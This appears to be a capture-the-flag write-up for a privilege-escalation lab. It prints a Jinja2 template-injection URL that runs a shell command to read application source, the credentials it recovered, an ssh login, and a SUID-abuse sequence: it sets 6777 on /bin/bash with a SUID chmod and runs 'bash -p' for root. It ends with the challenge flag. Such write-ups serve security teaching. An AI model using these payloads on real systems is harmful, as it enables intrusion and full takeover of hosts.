AUCHALL - [Privesc] - Temp Privesc
Challenge Description
Based on the credentials you got from Temp, it's time you escalate your privileges.
Solution
On running the following payload in Temp Web challenge we got credentials
http://SERVER-IP:PORT/{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat /app/app.py').read() }}
Credentials
Username: theflash2k
Password: 6s1251l7sj1
Using those credentials
ssh [email protected] -p PORT
First thing we would do is sudo -l
Then we would check for suid binaries
find / -perm /4000 2>/dev/null
/usr/bin/chmod
looked interesting
Go to this site (opens in a new tab)
$ LFILE=/bin/bash
$ /usr/bin/chmod 6777 $LFILE
Now suid bit of /bin/bash binary is set
$ bash -p
Flag
Flag is dynamic
CY243L{c0nf1g_us3rs_and_su1d_ez_pz_F5802AE_8Tcc_MocB}
Writeups 2023 © RootxRAN.